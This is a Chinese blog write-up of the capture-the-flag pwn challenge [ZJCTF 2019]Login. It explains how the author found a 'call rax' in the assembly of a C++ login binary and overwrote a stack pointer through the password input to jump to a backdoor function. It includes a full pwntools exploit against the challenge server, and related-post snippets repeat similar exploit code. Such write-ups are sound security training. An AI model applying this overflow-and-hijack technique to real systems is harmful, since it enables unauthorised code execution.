BUUCTF [ZJCTF 2019]Login

于 2025-03-22 00:53:09 发布
阅读量419 收藏 4
点赞数 16
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_85052854/article/details/146431796
版权

 拿到题目依然是放入ida

 居然是用c++编写的程序,看的都头痛,观察代码,推测该程序的用户名为“admin”密码为“2jctf_pa5sw0rd”试一试在程序输入

发现程序报错了,返回ida查看匹配密码的函数

 

 发现有个奇奇怪怪的(**a1)函数,在伪代码中看不出端倪,所以进入汇编代码看看怎么个事!

 

 里面居然有个 call rax的操作,也就是说如果我们能控制这里的rax使其rax里面的内容为后门函数,我们就可以直接调用到后门函数中,拿到shell。ida中我们可以看到只有输入密码有个fgets的函数给我们栈溢出。

 观察我们写入的s

 我们输入的s中只能覆盖var_58以下的内容

 理论上我们直接覆盖var_68成后门函数就可以拿到shell了,可是var_68在s上面,覆盖不到,那我们只能继续观察var_68中被rdi赋值的内容在哪里了。

 通过往前逆向观察汇编,发现被赋值成了var_130依然覆盖不了,继续跟进我们可以看到rdi最终赋值成了rax,跟进最近的一个函数:password_checker,查看rax被赋值成什么。

 最终发现了rax最终被赋值成了在var_18的位置,终于找到了一个我们可以覆盖的一个位置了,我们只需要将var_18覆盖成后门函数就可以获得shell

程序自带一个后门函数,开始构造payload进行覆盖,覆盖到var_18的偏移量为 0x60-0x18=0x48

以下为完整exp

from pwn import*
p=remote('node5.buuoj.cn',25068)
#p=process("./aaa")
shell=0x400e88
payload=b'2jctf_pa5sw0rd'
payload=payload.ljust(0x48,b'\x00')
payload+=p32(shell)
p.recv()
p.sendline(b"admin")
p.recv()
p.sendline(payload)
p.interactive()

 该题主要难点为保护开了canary,且观察汇编有什么其他办法直接跳转到后门函数

A秋逝
关注
ZJCTF 2019 Login
pondzhang的专栏
05-19 700
from pwn import * p = process('./login') p.sendlineafter("username: ","admin") payload = "2jctf_pa5sw0rd" + '\x00'*58 + p64(0x0000000000400E88) p.sendlineafter("password: ",payload) p.interactive()
BUUOJ PWN [ZJCTF 2019]Login
weixin_50287973的博客
11-18 421
输入这些断了下来 是在call rax那断了下来,追踪一下rax [rbp+var_130]的地址作为参数传入User::read_password(void),rax的值赋给了[rbp+var_130] 在password_checker()看看rax怎么来的 这样的话控制[rbp+var_18]为Admin::shell地址就可以了 输入password覆盖到[rbp+var_18] 0x60-0x18=72=14+58 由于_snprintf函数,写入的不含一定0字符的password格式
[ZJCTF 2019]Login
、moddemod
07-03 870
exp from pwn import * context.log_level = 'debug' proc_name = './login' # p = process(proc_name) p = remote('node3.buuoj.cn', 29641) ...
ZJCTF_2019_Login
z1r0的博客
12-12 2535
ZJCTF_2019_Login 查看保护 输入正确的密码和用户名,会发生错误,看一下汇编。 在crash之前call 了rax,逆一下找到rax被怎样赋值的。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
C++ PWN题解析:ZJCTF 2019 Login漏洞利用
"BUUCTF-PWN-[ZJCTF 2019]Login 是一个关于网络安全竞赛中的Pwn(破解)类题目,主要涉及到C++编程、汇编语言分析以及栈溢出漏洞的利用。" 该题目描述了一个登录系统,参赛者需要通过输入正确的账号和密码来访问...
BUUCTF逆向wp [FlareOn4]login
最新发布
2302_81740139的博客
07-14 1174
该算法并没有提供真正密码学上的保全,故它不应该被用于需要保全的用途上。result += chr((ord(char) - ord('a') + 13) % 26 + ord('a')) 计算字符的ASCII值,将其转换为0-25范围内的一个数,加13后对26取模,再加上 'a' 的ASCII值,最后转换回字符并添加到结果字符串中。result += chr((ord(char) - ord('A') + 13) % 26 + ord('A')) 这里的处理逻辑与小写字母相同,只是基准点变为了 'A'。
BUU [ZJCTF 2019]Login
fzucaicai的博客
03-04 879
这是一道让我感觉很淦的题,整一天了才大致了解了来龙去脉。
buuctf [ZJCTF 2019]Login
carol2358的博客
05-06 1216
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 在这里crash了, 去ida里看 ida里自己改名字,原来的看着太乱 反向分析 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp: from pwn import * from LibcSearc...
[ZJCTF 2019]Login--动态调试--详细版
weixin_41748164的博客
11-21 836
全网最详细login的解析,包含静态和动态分析
[BUUCTF]PWN——[ZJCTF 2019]Login
mcmuyanga的博客
11-05 2012
[ZJCTF 2019]Login 附件 步骤: 例行检查,64位程序,开启了canary和nx保护 2. 试运行一下程序 3. 64位ida载入,检索字符串,在程序里找到了用户名admin和密码2jctf_pa5sw0rd 再次尝试登录,无果 在程序里找到了后门函数,backdoor=0x400e88 c++写的程序,看起来有点费劲,自己看了好久都找到漏洞在哪里,后来借鉴了其他师傅的wp后才发现了猫腻 问题出现在检查密码的那个函数上 反编译出来的伪代码看起来没什么问题 但是我们按下tab,
[BUUCTF-pwn]——[ZJCTF 2019]Login
Y_peak的博客
03-11 459
[BUUCTF-pwn]——[ZJCTF 2019]Login 题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]Login 这道题学习还是很多的, 有的时候在源码中跟踪并不一定比在汇编代码中跟踪更快 这里最后一个函数的第一个参数会被当做函数执行,这里我就开始找那个地方可以将这个参数给改了。 v7也就是v3然后找来找去没发现。 不过汇编总是有奇效 这里有一篇博客超级详细, 我也就不在这里赘述了。 点击转跳 ...
[ZJCTF 2019]Login的wp
wuyvle的博客
03-05 363
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 进入ida看看 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp from pwn import * io = remote('node3.buuoj.cn',28457) shell = 0x400e88 io.sendlineafter(': ','admin') io.sendlineafter('
ZJCTF_login
Morphy_Amo的博客
07-18 542
zjctf_login
CTF-PWN-[ZJCTF 2019]Login 栈位置的转换跟踪
serfend's blog
06-23 1482
来源:https://buuoj.cn/challenges内容:附件:链接:https://pan.baidu.com/s/1uBEYYeg9ouPDEOah-BHGQA?pwd=6si8 提取码:6si8答案:PWN题为动态flag使用安装pwn解题框架发现是cpp的题目,在password_checker的第9行下断点到判断密码的位置,随后输入用户名admin,密码cylic(300)用于测试溢出点和调用点题目是比较密码是否等于,正确则跳转进入 发现此处的值是aaaa,则我们将密码设置为 +cylic
2019-ZJCTF
ChenZIDu的博客
12-13 1177
浙江省大学生网络安全竞赛:逆转思路 这题当初没做出来,可惜了。 主要是php序列化,以及data协议。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="w...
2019ZJCTF-Web
weixin_47813861的博客
09-20 215
不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_
【Pwn】SWPUCTF_2019_login
Nothing
12-09 1247
例行查看程序保护。 分析程序,最里面函数存在格式化字符串漏洞。但是格式化字符串不再栈上,而在bss段上,没办法直接任意地址读写,于是动态调试观察栈上数据。 观察到fff65158指向fff65168,fff65168指向fff65178。那么就可以修改fff65168的内容,然后再观察栈上还有什么有用数据,注意到fff65160和fff65164的值离got表很近,于是想到可以修改这两个地方的后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值